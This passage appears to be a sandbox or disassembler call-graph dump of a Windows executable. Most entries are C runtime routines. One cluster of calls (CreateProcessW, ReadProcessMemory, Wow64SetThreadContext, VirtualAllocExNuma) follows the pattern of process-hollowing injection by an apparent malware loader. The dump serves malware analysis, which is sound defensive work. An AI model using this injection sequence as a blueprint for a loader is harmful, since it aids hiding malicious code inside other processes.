11752->11753 11754 402897 EnterCriticalSection 11752->11754 11755 4059e4 __lock 67 API calls 11753->11755 11754->11725 11756 40288a 11755->11756 11756->11725 11758 4028f2 11757->11758 11759 402905 LeaveCriticalSection 11757->11759 11763 4058f2 LeaveCriticalSection 11758->11763 11759->11725 11761 402902 11761->11725 11762->11751 11763->11761 11775 406ca2 11764->11775 11766 406dbb 11766->11739 11768 406fd2 11767->11768 11769 406f53 11767->11769 12107 406e58 11768->12107 11771 402673 _signal 67 API calls 11769->11771 11773 40330f 11769->11773 11772 406f6a 11771->11772 11774 4025f0 _signal 6 API calls 11772->11774 11773->11733 11773->11743 11774->11773 11778 406cae _signal 11775->11778 11776 406cc1 11777 402673 _signal 67 API calls 11776->11777 11779 406cc6 11777->11779 11778->11776 11780 406cff 11778->11780 11781 4025f0 _signal 6 API calls 11779->11781 11786 4064cc 11780->11786 11785 406cd5 _signal 11781->11785 11785->11766 11787 4064f1 11786->11787 11851 40be0b 11787->11851 11790 406512 11791 402489 __invoke_watson 10 API calls 11790->11791 11792 40651c 11791->11792 11797 40651f 11792->11797 11793 406555 11875 402686 11793->11875 11796 402673 _signal 67 API calls 11798 406564 11796->11798 11797->11793 11800 406615 11797->11800 11799 4025f0 _signal 6 API calls 11798->11799 11823 406573 11799->11823 11857 404fde 11800->11857 11802 4066b7 11803 4066d8 CreateFileW 11802->11803 11804 4066be 11802->11804 11806 406772 GetFileType 11803->11806 11807 406705 11803->11807 11805 402686 _signal 67 API calls 11804->11805 11810 4066c3 11805->11810 11808 4067c3 11806->11808 11809 40677f GetLastError 11806->11809 11811 40673e GetLastError 11807->11811 11814 406719 CreateFileW 11807->11814 11883 404d99 11808->11883 11812 402699 __dosmaperr 67 API calls 11809->11812 11813 402673 _signal 67 API calls 11810->11813 11878 402699 11811->11878 11816 4067a8 CloseHandle 11812->11816 11817 4066cd 11813->11817 11814->11806 11814->11811 11816->11817 11818 4067b6 11816->11818 11821 402673 _signal 67 API calls 11817->11821 11820 402673 _signal 67 API calls 11818->11820 11822 4067bb 11820->11822 11821->11823 11822->11817 11847 406d40 11823->11847 11826 406b6f CloseHandle CreateFileW 11828 406b9a GetLastError 11826->11828 11829 406a77 11826->11829 11830 402699 __dosmaperr 67 API calls 11828->11830 11829->11823 11833 406ba6 11830->11833 11831 402686 _signal 67 API calls 11841 406857 11831->11841 11832 401c92 77 API calls __read_nolock 11832->11841 11973 404e1a 11833->11973 11835 402dce 69 API calls __lseek_nolock 11835->11841 11839 404a8f 69 API calls __lseeki64_nolock 11840 40685f 11839->11840 11840->11839 11840->11841 11902 40bb9a 11840->11902 11917 40b8db 11840->11917 11841->11832 11841->11835 11841->11840 11842 406a6a 11841->11842 11844 406a02 11841->11844 11948 40630f 11841->11948 11843 40bb9a __close_nolock 70 API calls 11842->11843 11845 406a71 11843->11845 11844->11823 11844->11826 11846 402673 _signal 67 API calls 11845->11846 11846->11829 11848 406d45 11847->11848 11850 406d6c 11847->11850 12106 404fb7 LeaveCriticalSection 11848->12106 11850->11785 11852 40650d 11851->11852 11853 40be1a 11851->11853 11852->11790 11852->11797 11854 402673 _signal 67 API calls 11853->11854 11855 40be1f 11854->11855 11856 4025f0 _signal 6 API calls 11855->11856 11856->11852 11858 404fea _signal 11857->11858 11859 405921 __mtinitlocknum 67 API calls 11858->11859 11860 404ffa 11859->11860 11861 4059e4 __lock 67 API calls 11860->11861 11862 404fff _signal 11860->11862 11870 40500e 11861->11870 11862->11802 11864 4050e7 11865 404cad __calloc_crt 67 API calls 11864->11865 11868 4050f0 11865->11868 11866 4059e4 __lock 67 API calls 11866->11870 11867 40508f EnterCriticalSection 11869 40509f LeaveCriticalSection 11867->11869 11867->11870 11874 405151 11868->11874 11985 404f17 11868->11985 11869->11870 11870->11864 11870->11866 11870->11867 11872 405b7c __ioinit InitializeCriticalSectionAndSpinCount 11870->11872 11870->11874 11982 4050b1 11870->11982 11872->11870 11995 40516f 11874->11995 11876 4044ab __getptd_noexit 67 API calls 11875->11876 11877 40268b 11876->11877 11877->11796 11879 402686 _signal 67 API calls 11878->11879 11880 4026a4 __dosmaperr 11879->11880 11881 402673 _signal 67 API calls 11880->11881 11882 4026b7 11881->11882 11882->11817 11884 404e00 11883->11884 11885 404da7 11883->11885 11886 402673 _signal 67 API calls 11884->11886 11885->11884 11890 404dcb 11885->11890 11887 404e05 11886->11887 11889 402686 _signal 67 API calls 11887->11889 11888 404df6 11888->11841 11888->11844 11892 402dce 11888->11892 11889->11888 11890->11888 11891 404df0 SetStdHandle 11890->11891 11891->11888 12003 404ea0 11892->12003 11894 402ddd 11895 402df3 SetFilePointer 11894->11895 11896 402de3 11894->11896 11898 402e0a GetLastError 11895->11898 11900 402e12 11895->11900 11897 402673 _signal 67 API calls 11896->11897 11899 402de8 11897->11899 11898->11900 11899->11831 11899->11841 11900->11899 11901 402699 __dosmaperr 67 API calls 11900->11901 11901->11899 11903 404ea0 __close_nolock 67 API calls 11902->11903 11905 40bbaa 11903->11905 11904 40bc00 11906 404e1a __free_osfhnd 68 API calls 11904->11906 11905->11904 11907 40bbde 11905->11907 11908 404ea0 __close_nolock 67 API calls 11905->11908 11910 40bc08 11906->11910 11907->11904 11909 404ea0 __close_nolock 67 API calls 11907->11909 11911 40bbd5 11908->11911 11912 40bbea CloseHandle 11909->11912 11913 40bc2a 11910->11913 11916 402699 __dosmaperr 67 API calls 11910->11916 11914 404ea0 __close_nolock 67 API calls 11911->11914 11912->11904 11915 40bbf6 GetLastError 11912->11915 11913->11840 11914->11907 11915->11904 11916->11913 12016 404a8f 11917->12016 11920 40b95d 11921 402673 _signal 67 API calls 11920->11921 11923 40b968 11920->11923 11921->11923 11922 404a8f __lseeki64_nolock 69 API calls 11925 40b916 11922->11925 11923->11840 11924 40b9f8 11930 404a8f __lseeki64_nolock 69 API calls 11924->11930 11944 40ba61 11924->11944 11925->11920 11925->11924 11926 40b93c GetProcessHeap HeapAlloc 11925->11926 11927 40b958 11926->11927 11936 40b96f __setmode_nolock 11926->11936 11929 402673 _signal 67 API calls 11927->11929 11928 404a8f __lseeki64_nolock 69 API calls 11928->11920 11929->11920 11931 40ba11 11930->11931 11931->11920 11932 404ea0 __close_nolock 67 API calls 11931->11932 11933 40ba27 SetEndOfFile 11932->11933 11935 40ba44 11933->11935 11933->11944 11937 402673 _signal 67 API calls 11935->11937 11939 40b9db 11936->11939 11947 40b9b2 __setmode_nolock 11936->11947 12026 405bdc 11936->12026 11938 40ba49 11937->11938 11940 402686 _signal 67 API calls 11938->11940 11941 402686 _signal 67 API calls 11939->11941 11942 40ba54 GetLastError 11940->11942 11943 40b9e0 11941->11943 11942->11944 11945 402673 _signal 67 API calls 11943->11945 11943->11947 11944->11920 11944->11928 11945->11947 11946 40b9c0 GetProcessHeap HeapFree 11946->11944 11947->11946 11949 40631b _signal 11948->11949 11950 406323 11949->11950 11951 40633e 11949->11951 11952 402686 _signal 67 API calls 11950->11952 11953 40634c 11951->11953 11956 40638d 11951->11956 11954 406328 11952->11954 11955 402686 _signal 67 API calls 11953->11955 11957 402673 _signal 67 API calls 11954->11957 11958 406351 11955->11958 11959 404f17 ___lock_fhandle 68 API calls 11956->11959 11966 406330 _signal 11957->11966 11960 402673 _signal 67 API calls 11958->11960 11961 406393 11959->11961 11962 406358 11960->11962 11964 4063a0 11961->11964 11965 4063b6 11961->11965 11963 4025f0 _signal 6 API calls 11962->11963 11963->11966 11967 405bdc __write_nolock 99 API calls 11964->11967 11968 402673 _signal 67 API calls 11965->11968 11966->11841 11969 4063ae 11967->11969 11970 4063bb 11968->11970 12102 4063e1 11969->12102 11971 402686 _signal 67 API calls 11970->11971 11971->11969 11974 404e86 11973->11974 11975 404e2b 11973->11975 11976 402673 _signal 67 API calls 11974->11976 11975->11974 11980 404e56 11975->11980 11977 404e8b 11976->11977 11978 402686 _signal 67 API calls 11977->11978 11979 404e7c 11978->11979 11979->11829 11980->11979 11981 404e76 SetStdHandle 11980->11981 11981->11979 11998 4058f2 LeaveCriticalSection 11982->11998 11984 4050b8 11984->11870 11986 404f23 _signal 11985->11986 11987 404f7e 11986->11987 11988 4059e4 __lock 67 API calls 11986->11988 11989 404fa0 _signal 11987->11989 11990 404f83 EnterCriticalSection 11987->11990 11991 404f4f 11988->11991 11989->11874 11990->11989 11992 404f66 11991->11992 11993 405b7c __ioinit InitializeCriticalSectionAndSpinCount 11991->11993 11999 404fae 11992->11999 11993->11992 12002 4058f2 LeaveCriticalSection 11995->12002 11997 405176 11997->11862 11998->11984 12000 4058f2 _doexit LeaveCriticalSection 11999->12000 12001 404fb5 12000->12001 12001->11987 12002->11997 12004 404ead 12003->12004 12008 404ec5 12003->12008 12005 402686 _signal 67 API calls 12004->12005 12007 404eb2 12005->12007 12006 402686 _signal 67 API calls 12009 404ef3 12006->12009 12010 402673 _signal 67 API calls 12007->12010 12008->12006 12011 404f0a 12008->12011 12012 402673 _signal 67 API calls 12009->12012 12013 404eba 12010->12013 12011->11894 12014 404efa 12012->12014 12013->11894 12015 4025f0 _signal 6 API calls 12014->12015 12015->12011 12017 404ea0 __close_nolock 67 API calls 12016->12017 12018 404aad 12017->12018 12019 404ab5 12018->12019 12020 404ac6 SetFilePointer 12018->12020 12021 402673 _signal 67 API calls 12019->12021 12022 404ade GetLastError 12020->12022 12023 404aba 12020->12023 12021->12023 12022->12023 12024 404ae8 12022->12024 12023->11920 12023->11922 12025 402699 __dosmaperr 67 API calls 12024->12025 12025->12023 12027 405beb __write_nolock 12026->12027 12028 405c44 12027->12028 12029 405c1d 12027->12029 12055 405c12 12027->12055 12032 405cac 12028->12032 12033 405c86 12028->12033 12031 402686 _signal 67 API calls 12029->12031 12030 4057a2 ___convertcp 5 API calls 12034 40630d 12030->12034 12035 405c22 12031->12035 12037 405cc0 12032->12037 12041 404a8f __lseeki64_nolock 69 API calls 12032->12041 12036 402686 _signal 67 API calls 12033->12036 12034->11936 12038 402673 _signal 67 API calls 12035->12038 12040 405c8b 12036->12040 12085 40b845 12037->12085 12042 405c29 12038->12042 12045 402673 _signal 67 API calls 12040->12045 12041->12037 12043 4025f0 _signal 6 API calls 12042->12043 12043->12055 12044 405ccb 12046 405f71 12044->12046 12094 404524 12044->12094 12047 405c94 12045->12047 12049 406240 WriteFile 12046->12049 12050 405f81 12046->12050 12048 4025f0 _signal 6 API calls 12047->12048 12048->12055 12054 406273 GetLastError 12049->12054 12058 405f53 12049->12058 12052 40605f 12050->12052 12072 405f95 12050->12072 12074 40606e 12052->12074 12076 40613f 12052->12076 12054->12058 12055->12030 12056 4062be 12056->12055 12061 402673 _signal 67 API calls 12056->12061 12057 405d11 12057->12046 12059 405d23 GetConsoleCP 12057->12059 12058->12055 12058->12056 12060 406291 12058->12060 12059->12058 12083 405d46 12059->12083 12063 4062b0 12060->12063 12064 40629c 12060->12064 12066 4062e1 12061->12066 12062 4061a5 WideCharToMultiByte 12062->12054 12069 4061dc WriteFile 12062->12069 12071 402699 __dosmaperr 67 API calls 12063->12071 12068 402673 _signal 67 API calls 12064->12068 12065 406003 WriteFile 12065->12054 12065->12072 12067 402686 _signal 67 API calls 12066->12067 12067->12055 12073 4062a1 12068->12073 12075 406213 GetLastError 12069->12075 12069->12076 12070 4060e3 WriteFile 12070->12054 12070->12074 12071->12055 12072->12056 12072->12058 12072->12065 12077 402686 _signal 67 API calls 12073->12077 12074->12056 12074->12058 12074->12070 12075->12076 12076->12056 12076->12058 12076->12062 12076->12069 12077->12055 12079 40b27f 11 API calls __putwch_nolock 12079->12083 12080 405df2 WideCharToMultiByte 12080->12058 12082 405e23 WriteFile 12080->12082 12081 40b540 79 API calls __fassign 12081->12083 12082->12054 12082->12083 12083->12054 12083->12058 12083->12079 12083->12080 12083->12081 12084 405e77 WriteFile 12083->12084 12099 40b592 12083->12099 12084->12054 12084->12083 12086 40b852 12085->12086 12087 40b861 12085->12087 12088 402673 _signal 67 API calls 12086->12088 12089 40b885 12087->12089 12090 402673 _signal 67 API calls 12087->12090 12091 40b857 12088->12091 12089->12044 12092 40b875 12090->12092 12091->12044 12093 4025f0 _signal 6 API calls 12092->12093 12093->12089 12095 4044ab __getptd_noexit 67 API calls 12094->12095 12096 40452c 12095->12096 12097 4036c7 __amsg_exit 67 API calls 12096->12097 12098 404539 GetConsoleMode 12096->12098 12097->12098 12098->12046 12098->12057 12100 40b55a __isleadbyte_l 77 API calls 12099->12100 12101 40b5a1 12100->12101 12101->12083 12105 404fb7 LeaveCriticalSection 12102->12105 12104 4063e9 12104->11966 12105->12104 12106->11850 12108 406e70 12107->12108 12116 406e8c 12107->12116 12109 406e77 12108->12109 12111 406ea0 12108->12111 12110 402673 _signal 67 API calls 12109->12110 12112 406e7c 12110->12112 12118 406dc0 12111->12118 12114 4025f0 _signal 6 API calls 12112->12114 12114->12116 12115 40bf3b 79 API calls __towlower_l 12117 406eab 12115->12117 12116->11773 12117->12115 12117->12116 12119 406dd3 12118->12119 12125 406e20 12118->12125 12120 404524 __getptd 67 API calls 12119->12120 12121 406dd8 12120->12121 12122 406e00 12121->12122 12126 4082cd 12121->12126 12122->12125 12141 4094bb 12122->12141 12125->12117 12127 4082d9 _signal 12126->12127 12128 404524 __getptd 67 API calls 12127->12128 12129 4082de 12128->12129 12130 40830c 12129->12130 12131 4082f0 12129->12131 12132 4059e4 __lock 67 API calls 12130->12132 12133 404524 __getptd 67 API calls 12131->12133 12134 408313 12132->12134 12135 4082f5 12133->12135 12157 40828f 12134->12157 12138 408303 _signal 12135->12138 12140 4036c7 __amsg_exit 67 API calls 12135->12140 12138->12122 12140->12138 12142 4094c7 _signal 12141->12142 12143 404524 __getptd 67 API calls 12142->12143 12144 4094cc 12143->12144 12145 4059e4 __lock 67 API calls 12144->12145 12154 4094de 12144->12154 12146 4094fc 12145->12146 12147 409545 12146->12147 12149 409513 InterlockedDecrement 12146->12149 12150 40952d InterlockedIncrement 12146->12150 12213 409556 12147->12213 12148 4094ec _signal 12148->12125 12149->12150 12153 40951e 12149->12153 12150->12147 12152 4036c7 __amsg_exit 67 API calls 12152->12148 12153->12150 12155 404a01 ___wtomb_environ 67 API calls 12153->12155 12154->12148 12154->12152 12156 40952c 12155->12156 12156->12150 12158 408293 12157->12158 12159 4082c5 12157->12159 12158->12159 12160 408141 ___addlocaleref 8 API calls 12158->12160 12165 408337 12159->12165 12161 4082a6 12160->12161 12161->12159 12168 4081d0 12161->12168 12212 4058f2 LeaveCriticalSection 12165->12212 12167 40833e 12167->12135 12169 4081e1 InterlockedDecrement 12168->12169 12170 408264 12168->12170 12171 4081f6 InterlockedDecrement 12169->12171 12172 4081f9 12169->12172 12170->12159 12182 407ff8 12170->12182 12171->12172 12173 408203 InterlockedDecrement 12172->12173 12174 408206 12172->12174 12173->12174 12175 408210 InterlockedDecrement 12174->12175 12176 408213 12174->12176 12175->12176 12177 40821d InterlockedDecrement 12176->12177 12178 408220 12176->12178 12177->12178 12179 408239 InterlockedDecrement 12178->12179 12180 408249 InterlockedDecrement 12178->12180 12181 408254 InterlockedDecrement 12178->12181 12179->12178 12180->12178 12181->12170 12183 40807c 12182->12183 12186 40800f 12182->12186 12184 404a01 ___wtomb_environ 67 API calls 12183->12184 12185 4080c9 12183->12185 12187 40809d 12184->12187 12188 40ce6d ___free_lc_time 67 API calls 12185->12188 12195 4080f0 12185->12195 12186->12183 12192 404a01 ___wtomb_environ 67 API calls 12186->12192 12208 408043 12186->12208 12190 404a01 ___wtomb_environ 67 API calls 12187->12190 12189 4080e9 12188->12189 12191 404a01 ___wtomb_environ 67 API calls 12189->12191 12194 4080b0 12190->12194 12191->12195 12197 408038 12192->12197 12193 408135 12198 404a01 ___wtomb_environ 67 API calls 12193->12198 12199 404a01 ___wtomb_environ 67 API calls 12194->12199 12195->12193 12206 404a01 67 API calls ___wtomb_environ 12195->12206 12196 404a01 ___wtomb_environ 67 API calls 12201 408071 12196->12201 12202 40d2bd ___free_lconv_mon 67 API calls 12197->12202 12203 40813b 12198->12203 12204 4080be 12199->12204 12200 404a01 ___wtomb_environ 67 API calls 12205 408059 12200->12205 12207 404a01 ___wtomb_environ 67 API calls 12201->12207 12202->12208 12203->12159 12209 404a01 ___wtomb_environ 67 API calls 12204->12209 12210 40d0ae ___free_lconv_num 67 API calls 12205->12210 12206->12195 12207->12183 12208->12200 12211 408064 12208->12211 12209->12185 12210->12211 12211->12196 12212->12167 12216 4058f2 LeaveCriticalSection 12213->12216 12215 40955d 12215->12154 12216->12215 12218 4028d6 LeaveCriticalSection 12217->12218 12219 4028b7 12217->12219 12218->11748 12219->12218 12220 4028be 12219->12220 12223 4058f2 LeaveCriticalSection 12220->12223 12222 4028d3 12222->11748 12223->12222 12225 402845 12224->12225 12226 402867 EnterCriticalSection 12224->12226 12225->12226 12227 40284d 12225->12227 12228 40180b 12226->12228 12229 4059e4 __lock 67 API calls 12227->12229 12230 401731 12228->12230 12229->12228 12231 401751 12230->12231 12232 401741 12230->12232 12237 401763 12231->12237 12282 401526 12231->12282 12233 402673 _signal 67 API calls 12232->12233 12236 401746 12233->12236 12242 401836 12236->12242 12245 402f1f 12237->12245 12243 4028a6 _fseek 2 API calls 12242->12243 12244 40183e 12243->12244 12244->11660 12246 402f38 12245->12246 12250 401771 12245->12250 12247 402351 __fileno 67 API calls 12246->12247 12246->12250 12248 402f53 12247->12248 12249 40630f __locking 101 API calls 12248->12249 12249->12250 12251 402351 12250->12251 12252 402360 12251->12252 12253 4017a3 12251->12253 12254 402673 _signal 67 API calls 12252->12254 12257 402e43 12253->12257 12255 402365 12254->12255 12256 4025f0 _signal 6 API calls 12255->12256 12256->12253 12258 402e4f _signal 12257->12258 12259 402e72 12258->12259 12260 402e57 12258->12260 12262 402e80 12259->12262 12265 402ec1 12259->12265 12261 402686 _signal 67 API calls 12260->12261 12263 402e5c 12261->12263 12264 402686 _signal 67 API calls 12262->12264 12266 402673 _signal 67 API calls 12263->12266 12267 402e85 12264->12267 12268 404f17 ___lock_fhandle 68 API calls 12265->12268 12277 402e64 _signal 12266->12277 12269 402673 _signal 67 API calls 12267->12269 12270 402ec7 12268->12270 12271 402e8c 12269->12271 12272 402ed4 12270->12272 12273 402eea 12270->12273 12274 4025f0 _signal 6 API calls 12271->12274 12275 402dce __lseek_nolock 69 API calls 12272->12275 12276 402673 _signal 67 API calls 12273->12276 12274->12277 12278 402ee2 12275->12278 12279 402eef 12276->12279 12277->12236 12299 402f15 12278->12299 12280 402686 _signal 67 API calls 12279->12280 12280->12278 12283 401559 12282->12283 12284 401539 12282->12284 12285 402351 __fileno 67 API calls 12283->12285 12286 402673 _signal 67 API calls 12284->12286 12287 40155f 12285->12287 12288 40153e 12286->12288 12290 402e43 __locking 71 API calls 12287->12290 12289 4025f0 _signal 6 API calls 12288->12289 12298 40154e 12289->12298 12291 401574 12290->12291 12292 4015e8 12291->12292 12294 4015a3 12291->12294 12291->12298 12293 402673 _signal 67 API calls 12292->12293 12293->12298 12295 402e43 __locking 71 API calls 12294->12295 12294->12298 12296 401643 12295->12296 12297 402e43 __locking 71 API calls 12296->12297 12296->12298 12297->12298 12298->12237 12302 404fb7 LeaveCriticalSection 12299->12302 12301 402f1d 12301->12277 12302->12301 12304 4028a6 _fseek 2 API calls 12303->12304 12305 40172f 12304->12305 12305->11672 12307 40147f _signal 12306->12307 12308 401493 _memset 12307->12308 12309 4014c8 12307->12309 12310 4014bd _signal 12307->12310 12313 402673 _signal 67 API calls 12308->12313 12311 402833 __lock_file 68 API calls 12309->12311 12310->11676 12312 4014d0 12311->12312 12319 40124c 12312->12319 12314 4014ad 12313->12314 12316 4025f0 _signal 6 API calls 12314->12316 12316->12310 12321 40126a _memset 12319->12321 12325 401288 12319->12325 12320 401273 12322 402673 _signal 67 API calls 12320->12322 12321->12320 12321->12325 12331 4012c7 12321->12331 12323 401278 12322->12323 12324 4025f0 _signal 6 API calls 12323->12324 12324->12325 12335 4014ff 12325->12335 12327 401411 _memset 12333 402673 _signal 67 API calls 12327->12333 12328 4013e5 _memset 12332 402673 _signal 67 API calls 12328->12332 12329 402351 __fileno 67 API calls 12329->12331 12331->12325 12331->12327 12331->12328 12331->12329 12338 402254 12331->12338 12368 401b67 12331->12368 12388 402383 12331->12388 12332->12323 12333->12323 12336 4028a6 _fseek 2 API calls 12335->12336 12337 401507 12336->12337 12337->12310 12339 402260 _signal 12338->12339 12340 402283 12339->12340 12341 402268 12339->12341 12343 402291 12340->12343 12346 4022d2 12340->12346 12342 402686 _signal 67 API calls 12341->12342 12344 40226d 12342->12344 12345 402686 _signal 67 API calls 12343->12345 12347 402673 _signal 67 API calls 12344->12347 12348 402296 12345->12348 12349 4022f3 12346->12349 12350 4022df 12346->12350 12358 402275 _signal 12347->12358 12351 402673 _signal 67 API calls 12348->12351 12353 404f17 ___lock_fhandle 68 API calls 12349->12353 12352 402686 _signal 67 API calls 12350->12352 12354 40229d 12351->12354 12355 4022e4 12352->12355 12356 4022f9 12353->12356 12361 4025f0 _signal 6 API calls 12354->12361 12357 402673 _signal 67 API calls 12355->12357 12359 402306 12356->12359 12360 40231c 12356->12360 12357->12354 12358->12331 12400 401c92 12359->12400 12363 402673 _signal 67 API calls 12360->12363 12361->12358 12365 402321 12363->12365 12364 402314 12469 402347 12364->12469 12366 402686 _signal 67 API calls 12365->12366 12366->12364 12369 401b77 12368->12369 12371 401b94 12368->12371 12370 402673 _signal 67 API calls 12369->12370 12372 401b7c 12370->12372 12374 401bc9 12371->12374 12382 401b8c 12371->12382 12473 4049b8 12371->12473 12373 4025f0 _signal 6 API calls 12372->12373 12373->12382 12376 402351 __fileno 67 API calls 12374->12376 12377 401bdd 12376->12377 12378 402254 __read 79 API calls 12377->12378 12379 401be4 12378->12379 12380 402351 __fileno 67 API calls 12379->12380 12379->12382 12381 401c07 12380->12381 12381->12382 12383 402351 __fileno 67 API calls 12381->12383 12382->12331 12384 401c13 12383->12384 12384->12382 12385 402351 __fileno 67 API calls 12384->12385 12386 401c1f 12385->12386 12387 402351 __fileno 67 API calls 12386->12387 12387->12382 12389 402393 12388->12389 12390 402397 12388->12390 12389->12331 12391 40239c 12390->12391 12392 4023d2 _memset 12390->12392 12394 4023c1 12390->12394 12393 402673 _signal 67 API calls 12391->12393 12392->12391 12398 4023e6 12392->12398 12395 4023a1 12393->12395 12396 405290 _signal __VEC_memcpy 12394->12396 12397 4025f0 _signal 6 API calls 12395->12397 12396->12389 12397->12389 12398->12389 12399 402673 _signal 67 API calls 12398->12399 12399->12395 12401 401cc9 12400->12401 12402 401cae 12400->12402 12403 401cd8 12401->12403 12405 401cff 12401->12405 12404 402686 _signal 67 API calls 12402->12404 12406 402686 _signal 67 API calls 12403->12406 12407 401cb3 12404->12407 12409 401d1e 12405->12409 12420 401d32 12405->12420 12408 401cdd 12406->12408 12410 402673 _signal 67 API calls 12407->12410 12411 402673 _signal 67 API calls 12408->12411 12412 402686 _signal 67 API calls 12409->12412 12421 401cbb 12410->12421 12414 401ce4 12411->12414 12416 401d23 12412->12416 12413 401d8a 12415 402686 _signal 67 API calls 12413->12415 12417 4025f0 _signal 6 API calls 12414->12417 12418 401d8f 12415->12418 12419 402673 _signal 67 API calls 12416->12419 12417->12421 12422 402673 _signal 67 API calls 12418->12422 12423 401d2a 12419->12423 12420->12413 12420->12421 12424 401d66 12420->12424 12426 401dab 12420->12426 12421->12364 12422->12423 12425 4025f0 _signal 6 API calls 12423->12425 12424->12413 12429 401d71 ReadFile 12424->12429 12425->12421 12427 404c68 __malloc_crt 67 API calls 12426->12427 12430 401dc1 12427->12430 12431 402218 GetLastError 12429->12431 12432 401e9d 12429->12432 12435 401de7 12430->12435 12436 401dc9 12430->12436 12433 402225 12431->12433 12434 40209e 12431->12434 12432->12431 12439 401eb1 12432->12439 12437 402673 _signal 67 API calls 12433->12437 12443 402699 __dosmaperr 67 API calls 12434->12443 12448 402023 12434->12448 12440 404a8f __lseeki64_nolock 69 API calls 12435->12440 12438 402673 _signal 67 API calls 12436->12438 12441 40222a 12437->12441 12442 401dce 12438->12442 12439->12448 12450 401ecd 12439->12450 12452 4020e3 12439->12452 12444 401df3 12440->12444 12445 402686 _signal 67 API calls 12441->12445 12446 402686 _signal 67 API calls 12442->12446 12443->12448 12444->12429 12445->12448 12446->12421 12447 404a01 ___wtomb_environ 67 API calls 12447->12421 12448->12421 12448->12447 12449 401f33 ReadFile 12454 401f51 GetLastError 12449->12454 12460 401f5b 12449->12460 12450->12449 12457 401fb0 12450->12457 12451 40215b ReadFile 12455 40217a GetLastError 12451->12455 12461 402184 12451->12461 12452->12448 12452->12451 12453 402074 MultiByteToWideChar 12453->12448 12456 402098 GetLastError 12453->12456 12454->12450 12454->12460 12455->12452 12455->12461 12456->12434 12457->12448 12458 40202b 12457->12458 12459 40201e 12457->12459 12466 401fe8 12457->12466 12465 402062 12458->12465 12458->12466 12462 402673 _signal 67 API calls 12459->12462 12460->12450 12463 404a8f __lseeki64_nolock 69 API calls 12460->12463 12461->12452 12464 404a8f __lseeki64_nolock 69 API calls 12461->12464 12462->12448 12463->12460 12464->12461 12467 404a8f __lseeki64_nolock 69 API calls 12465->12467 12466->12453 12468 402071 12467->12468 12468->12453 12472 404fb7 LeaveCriticalSection 12469->12472 12471 40234f 12471->12358 12472->12471 12474 404c68 __malloc_crt 67 API calls 12473->12474 12475 4049cd 12474->12475 12475->12374 12476->11679 12504 24005f GetPEB 12477->12504 12479 24084c 12505 24005f GetPEB 12479->12505 12481 24085f 12506 24005f GetPEB 12481->12506 12483 240872 12507 2407da 12483->12507 12485 240880 12486 24089c VirtualAllocExNuma 12485->12486 12487 2408a9 12486->12487 12512 24073a 12487->12512 12519 24005f GetPEB 12490->12519 12492 2403b3 12492->11687 12493 2403c1 CreateProcessW 12495 2403eb 12493->12495 12502 240218 12493->12502 12494 240410 ReadProcessMemory 12494->12495 12494->12502 12495->12492 12547 241291 12495->12547 12498 241440 11 API calls 12498->12502 12500 240675 Wow64SetThreadContext 12500->12495 12500->12502 12502->12492 12502->12493 12502->12494 12502->12495 12502->12498 12502->12500 12503 241291 11 API calls 12502->12503 12520 241326 12502->12520 12529 2410df 12502->12529 12538 2411e0 12502->12538 12503->12502 12504->12479 12505->12481 12506->12483 12517 24005f GetPEB 12507->12517 12509 2407ea 12510 2407f0 GetSystemInfo 12509->12510 12511 24081b 12510->12511 12511->12485 12518 24005f GetPEB 12512->12518 12514 240746 12515 240766 VirtualAlloc 12514->12515 12516 240783 12515->12516 12516->11681 12517->12509 12518->12514 12519->12502 12521 241341 12520->12521 12556 24013e GetPEB 12521->12556 12523 241362 12524 24141a 12523->12524 12525 24136a 12523->12525 12573 24176c 12524->12573 12558 240ee0 12525->12558 12528 241401 12528->12502 12530 2410fa 12529->12530 12531 24013e GetPEB 12530->12531 12532 24111b 12531->12532 12533 241123 12532->12533 12534 2411ad 12532->12534 12535 240ee0 10 API calls 12533->12535 12583 241790 12534->12583 12537 241194 12535->12537 12537->12502 12539 2411fb 12538->12539 12540 24013e GetPEB 12539->12540 12541 24121c 12540->12541 12542 241266 12541->12542 12543 241220 12541->12543 12586 2417a2 12542->12586 12544 240ee0 10 API calls 12543->12544 12546 24125b 12544->12546 12546->12502 12548 2412a4 12547->12548 12549 24013e GetPEB 12548->12549 12550 2412c5 12549->12550 12551 24130f 12550->12551 12552 2412c9 12550->12552 12589 24175a 12551->12589 12553 240ee0 10 API calls 12552->12553 12555 241304 12553->12555 12555->12492 12557 240160 12556->12557 12557->12523 12576 24005f GetPEB 12558->12576 12560 240f29 12577 240109 GetPEB 12560->12577 12563 240fb6 12564 240fc7 VirtualAlloc 12563->12564 12567 24108b 12563->12567 12565 240fdd ReadFile 12564->12565 12564->12567 12566 240ff2 VirtualAlloc 12565->12566 12565->12567 12566->12567 12570 241013 12566->12570 12568 2410d4 12567->12568 12569 2410c9 VirtualFree 12567->12569 12568->12528 12569->12568 12570->12567 12571 24107e VirtualFree 12570->12571 12572 24107a CloseHandle 12570->12572 12571->12567 12572->12571 12574 240ee0 10 API calls 12573->12574 12575 241776 12574->12575 12575->12528 12576->12560 12578 24011c 12577->12578 12580 240131 CreateFileW 12578->12580 12581 24017b GetPEB 12578->12581 12580->12563 12580->12567 12582 24019f 12581->12582 12582->12578 12584 240ee0 10 API calls 12583->12584 12585 24179a 12584->12585 12585->12537 12587 240ee0 10 API calls 12586->12587 12588 2417ac 12587->12588 12588->12546 12590 240ee0 10 API calls 12589->12590 12591 241764 12590->12591 12591->12555 12593 40388f _signal 12592->12593 12594 4059e4 __lock 67 API calls 12593->12594 12595 403896 12594->12595 12597 40429b __decode_pointer 6 API calls 12595->12597 12601 40394f __initterm 12595->12601 12599 4038cd 12597->12599 12599->12601 12603 40429b __decode_pointer 6 API calls 12599->12603 12600 403997 _signal 12600->11131 12609 40399a 12601->12609 12608 4038e2 12603->12608 12604 40398e 12605 40371b _malloc 3 API calls 12604->12605 12605->12600 12606 40429b 6 API calls __decode_pointer 12606->12608 12607 404292 7 API calls ___crtMessageBoxW 12607->12608 12608->12601 12608->12606 12608->12607 12610 4039a0 12609->12610 12611 40397b 12609->12611 12614 4058f2 LeaveCriticalSection 12610->12614 12611->12600 12613 4058f2 LeaveCriticalSection 12611->12613 12613->12604 12614->12611 14453 4136e2 14454 4136ee _signal 14453->14454 14455 4059e4 __lock 67 API calls 14454->14455 14456 4136f5 14455->14456 14461 413483 14456->14461 14460 413711 _signal 14462 412dac __get_daylight 67 API calls 14461->14462 14463 41349a 14462->14463 14464 4134a9 14463->14464 14465 402489 __invoke_watson 10 API calls 14463->14465 14466 413597 14464->14466 14467 4134df 14464->14467 14468 4134b1 14464->14468 14465->14464 14469 41328c _cvtdate 67 API calls 14466->14469 14478 